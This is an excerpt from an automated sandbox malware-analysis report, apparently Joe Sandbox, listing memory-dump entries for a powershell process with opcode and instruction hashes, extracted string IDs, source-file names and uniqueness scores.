                                                      • Opcode Fuzzy Hash: 7a1ec50747a969252c4ee1fdbfb9132c3ae75876c1790db43f161dc4feb60a24
                                                      • Instruction Fuzzy Hash: 1831C4B5B003469FCB358E14D5406FBBFB2AF85210B24C6ABDD048B243C7369885CBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $kq$$kq$$kq$$kq
                                                      • API String ID: 0-2881790790
                                                      • Opcode ID: 1790d40c9e8624b904e1d4e0ef4318772faa2bcec01f24864586f404ba6b5d2c
                                                      • Instruction ID: 08f5a300487369542b381b6dfaaf10488a29dca18ff1da8b22875d511e634138
                                                      • Opcode Fuzzy Hash: 1790d40c9e8624b904e1d4e0ef4318772faa2bcec01f24864586f404ba6b5d2c
                                                      • Instruction Fuzzy Hash: 9C2129B1310206EBDB38597A9801BA777DB5BC0710F24893FAD05CB392DE79E845C360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,Sul$4'kq$d5ek$xSul
                                                      • API String ID: 0-2816686370
                                                      • Opcode ID: b94cd10ee7ba3946e563329cb76bf9198866172eb503121687d899b9ac6e218e
                                                      • Instruction ID: 86b5bd28ddb493d0f1d9a13c54561b368f178d6d09fee69693f74991511d5493
                                                      • Opcode Fuzzy Hash: b94cd10ee7ba3946e563329cb76bf9198866172eb503121687d899b9ac6e218e
                                                      • Instruction Fuzzy Hash: 663104F1B002079FCB228F189940AAFBBA2AB85354F14C177DE058F352DB30E951C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2202005490.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'kq$4'kq$$kq$$kq
                                                      • API String ID: 0-1727931526
                                                      • Opcode ID: a9524627af231ee1e381459ea4512172e390ae38c1fbd3a7ffd3b834ff87f951
                                                      • Instruction ID: 7e8940991b5a1aa4e0f8e94e2ba913b3c97efe0f84c7699ecaf3ee5f5a803aee
                                                      • Opcode Fuzzy Hash: a9524627af231ee1e381459ea4512172e390ae38c1fbd3a7ffd3b834ff87f951
                                                      • Instruction Fuzzy Hash: 6801DB2530A3D64FC33B163819201A66FB2AF8365073A05EBD481CB3A3C9198D0A83B7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%